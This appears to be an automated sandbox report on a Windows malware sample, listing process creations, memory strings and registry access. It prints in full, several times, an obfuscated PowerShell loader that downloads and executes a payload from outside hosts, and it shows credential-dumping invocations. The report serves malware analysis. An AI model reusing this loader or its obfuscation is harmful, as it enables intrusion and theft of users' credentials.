Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: 0%s 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: exepath 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: 0%s 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: exepath 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: licence 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: dMG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: PSG 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: Administrator 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: User 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: del 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: del 0_2_0040E9C5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Command line argument: del 0_2_0040E9C5
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2064
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5644
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000005.00000002.2172676550.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4554798686.0000000002DC0000.00000040.10000000.00040000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wscript.exe, 00000003.00000002.2189557696.0000000005852000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Select * from Win32_Service");
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2198587650.00000000027C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl" Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk" Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Process created: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl 